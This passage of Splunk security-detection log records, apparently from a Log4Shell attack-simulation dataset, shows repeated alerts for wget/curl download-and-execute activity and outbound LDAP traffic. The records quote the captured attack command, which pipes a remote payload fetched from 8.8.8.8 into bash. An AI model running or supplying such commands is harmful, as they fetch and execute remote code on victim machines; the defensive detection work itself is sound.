the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633944", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:24", parent_process_id="7877", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7879", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", 
risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote 
file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633942", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:12:22", parent_process_id="7870", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7872", process_name="wget", risk_message="An 
instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631831", info_max_time="+Infinity", info_min_time="0.000", 
lastTime="2022-01-19T22:37:11", parent_process_id="7798", parent_process_name="dash", process="wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8", process_id="7799", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", 
dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", 
annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642630698", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:18:18", parent_process_id="5678", parent_process_name="bash", process="wget https://github.com/d1vious/log4shell_bits/raw/main/log4shell-vulnerable-app-0.0.1-SNAPSHOT.jar", process_id="7708", process_name="wget", risk_message="An instance of wget was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="wget", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642638101", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-20T00:21:41", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="8018", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint 
sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633814", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:14", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl 
http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7877", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", 
info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", 
annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642633812", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T23:10:12", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7870", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress 
Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="sysmonlinux-jhernandez-16155-1604", risk_object_type="system", risk_score="80.0", savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. 
This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642416, search_name="ESCU - Wget Download and Bash Execution - Rule", analyticstories="Ingress Tool Transfer", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Ingress Tool Transfer\",\"Log4Shell CVE-2021-44228\"],\"context\":[\"Source:Endpoint\",\"Stage:Defense Evasion\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Exploitation\"],\"mitre_attack\":[\"T1105\"],\"observable\":[]}", annotations._all="Log4Shell CVE-2021-44228", annotations._all="CVE-2021-44228", annotations._all="Source:Endpoint", annotations._all="Exploitation", annotations._all="T1105", annotations._all="Stage:Defense Evasion", annotations._all="Ingress Tool Transfer", annotations._frameworks="analytic_story", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations.analytic_story="Ingress Tool Transfer", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.context="Source:Endpoint", annotations.context="Stage:Defense Evasion", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Exploitation", annotations.mitre_attack="T1105", count="1", dest="sysmonlinux-jhernandez-16155-1604", firstTime="1642631700", info_max_time="+Infinity", info_min_time="0.000", lastTime="2022-01-19T22:35:00", parent_process_id="7756", parent_process_name="-", process="/bin/sh -c (curl http://8.8.8.8:80/wp-content/themes/twentythirteen/m8 || wget -qO - http://8.8.8.8:80/wp-content/themes/twentythirteen/m8)|bash", process_id="7798", process_name="dash", risk_message="An instance of dash was identified on endpoint sysmonlinux-jhernandez-16155-1604 attempting to download a remote file and run it with bash.", risk_object="ubuntu", risk_object_type="user", risk_score="80.0", 
savedsearch_description="The following analytic identifies the use of wget on Linux or MacOS attempting to download a file from a remote source and pipe it to bash. This is typically found with coinminers and most recently with CVE-2021-44228, a vulnerability in Log4j.", threat_object="dash", threat_object_type="process", user="ubuntu" 1642642153, search_name="ESCU - Detect Outbound LDAP Traffic - Rule", analyticstories="Log4Shell CVE-2021-44228", annotations="{\"analytic_story\":[\"Log4Shell CVE-2021-44228\"],\"cis20\":[\"CIS 12\",\"CIS 13\"],\"context\":[\"Source:Endpoint\",\"Stage:Initial Access\"],\"cve\":[\"CVE-2021-44228\"],\"kill_chain_phases\":[\"Command and Control\",\"Actions on Objectives\"],\"mitre_attack\":[\"T1190\",\"T1059\"],\"nist\":[\"PR.DS\",\"PR.PT\",\"DE.AE\",\"DE.CM\"],\"observable\":[]}", annotations._all="PR.PT", annotations._all="T1190", annotations._all="Command and Control", annotations._all="CIS 12", annotations._all="DE.AE", annotations._all="Source:Endpoint", annotations._all="CIS 13", annotations._all="Stage:Initial Access", annotations._all="DE.CM", annotations._all="T1059", annotations._all="CVE-2021-44228", annotations._all="Actions on Objectives", annotations._all="Log4Shell CVE-2021-44228", annotations._all="PR.DS", annotations._frameworks="analytic_story", annotations._frameworks="cis20", annotations._frameworks="context", annotations._frameworks="cve", annotations._frameworks="kill_chain_phases", annotations._frameworks="mitre_attack", annotations._frameworks="nist", annotations.analytic_story="Log4Shell CVE-2021-44228", annotations.cis20="CIS 12", annotations.cis20="CIS 13", annotations.context="Source:Endpoint", annotations.context="Stage:Initial Access", annotations.cve="CVE-2021-44228", annotations.kill_chain_phases="Command and Control", annotations.kill_chain_phases="Actions on Objectives", annotations.mitre_attack="T1190", annotations.mitre_attack="T1059", annotations.nist="PR.DS", annotations.nist="PR.PT", 
